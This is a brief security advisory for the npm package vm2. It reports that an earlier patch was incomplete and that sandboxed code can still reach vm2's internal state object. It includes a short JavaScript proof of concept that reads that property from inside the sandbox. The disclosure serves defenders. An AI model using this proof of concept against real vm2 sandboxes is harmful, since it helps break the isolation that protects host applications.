PT-2026-41697 · Npm · Vm2
Published: 2026-05-08 · Updated: 2026-05-08
CVSS v3.1: 5.3 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary
The issue described in the advisory https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.
Details
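It is still possible to get access to `VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL`.
PoC
```js
const {VM} = require("vm2");
const vm = new VM();
// The sandboxed script reads the internal-state property from globalThis;
// the host then logs whatever the sandbox was able to reach.
console.log(vm.run(`
globalThis['VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL']
`));
```
Fix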
Protection Mechanism Failure
Weakness Enumeration
Related Identifiers
Affected Products
Vm2